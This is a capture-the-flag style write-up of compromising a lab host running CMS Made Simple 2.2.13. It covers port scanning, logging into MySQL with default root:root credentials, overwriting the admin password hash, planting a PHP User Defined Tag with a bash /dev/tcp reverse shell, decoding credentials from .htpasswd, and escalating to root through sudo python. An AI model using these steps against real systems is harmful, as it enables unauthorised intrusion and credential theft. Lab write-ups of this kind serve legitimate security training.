# Summary
**We perform a network scan on 192.168.86.74 and discovered 3 open ports, 22,80 and 3306.
Performing basic enumeration on the web server and discovered it is running CMS Made Simple Version 2.213. Searching online for any known vulnerabilities we stumble upon a paper on exploitDB. The paper explains on how to exploit the vulnerability through accessing the SQL server using default credentials. From there we can find the admin hash but isn't crack-able. We can update the password for the admin user and set it to our preference.We can now login with the newly set credential and access the admin panel. To gain foothold, we can head to extensions and change the code for User-Defined-Tags specifically `user-agents` to execute commands.**
# Enumeration
## NMAP
```txt
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 27:21:9e:b5:39:63:e9:1f:2c:b2:6b:d3:3a:5f:31:7b (RSA)
|   256 bf:90:8a:a5:d7:e5:de:89:e6:1a:36:a1:93:40:18:57 (ECDSA)
|_  256 95:1f:32:95:78:08:50:45:cd:8c:7c:71:4a:d4:6c:1c (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: CMS Made Simple - Copyright (C) 2004-2020. All rights reserved.
|_http-title: Home - My CMS
|_http-favicon: Unknown favicon MD5: 551E34ACF2930BF083670FA203420993
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
3306/tcp open  mysql   MySQL 8.0.19
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.19
|   Thread ID: 11
|   Capabilities flags: 65535
|   Some Capabilities: LongPassword, IgnoreSigpipes, SwitchToSSLAfterHandshake, ODBCClient, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, InteractiveClient, Support41Auth, SupportsTransactions, ConnectWithDatabase, SupportsCompression, FoundRows, Speaks41ProtocolNew, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, LongColumnFlag, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: @{\x05%\x16\x06T\x10O\x01\x17ow9\x7Fwg[eE
|_  Auth Plugin Name: mysql_native_password
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Web
- CMS used is CMS Made Simple
- There's an `/admin` endpoint which requires authentication.
- CMS version 2.2.13

# Foothold?
- After finding out the version, I found a paper for the version on [exploitDB](https://www.exploit-db.com/docs/49947)
- Since port 3306 is open, we can try to connect with default credentials which is `root:root` and we're successful.
- There is a database called `cmsms_db` which the table `cms_users` which contains the admin credentials.
`admin:59f9ba27528694d9b3493dfde7709e70`
- Unable to crack with john and crackstation
- We can update and set the password for the `admin` user using some SQL commands.
```sql
update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'hackNos'))) where username = 'admin';
```
- We can now login into the admin panel with `admin:hackNos`
- To execute commands, we can head to extensions and under `User Defined Tags`, it allows admins to make code-level changes.
- We can include a PHP system commands to execute commands on the server.
```php
system("bash -c 'bash -i >& /dev/tcp/192.168.49.86/9001 0>&1'");
```
- To execute it, simply curl the site with `?page=user-defined-tags` as the parameter.
```sh
$ curl -vv http://192.168.1.47/index.php?page=user-defined-tags
```
- We should receive a reverse shell on port 9001 where we set up our listener.


# Post-Exploit
## Internal Enumeration
- Kernel version is `4.19.0-8-amd64`, no known exploits
- `Sudo` version not vulnerable
- Only 1 user which is `armour`
- Found `config.php` but doesn't contain any useful credentials.
- Found a hash in `admin/.htpasswd`
```sh
(remote) www-data@mycmsms:/var/www/html$ cat admin/.htpasswd 
TUZaRzIzM1ZPSTVGRzJESk1WV0dJUUJSR0laUT09PT0=
```
- The encoding used for this was base64 and then base32
`armour:Shield@123`

## Privilege Escalation
- We can escalate to user `armour` using the credentials found.
- Checking `sudo -l`
```sh
User armour may run the following commands on mycmsms:
    (root) NOPASSWD: /usr/bin/python
```
- We can a spawn a shell using python, and since we're running it with `sudo` it'll be a privileged shell.
- For reference, check [GTFObins entry for python](https://gtfobins.github.io/gtfobins/python/#sudo)
- We now have an escalated shell as user `root`
```sh
root@mycmsms:~# cat proof.txt 
2f21066590c7072fd631115cbeb52c7f
root@mycmsms:~# cat proof.txt | id
uid=0(root) gid=0(root) groups=0(root)
```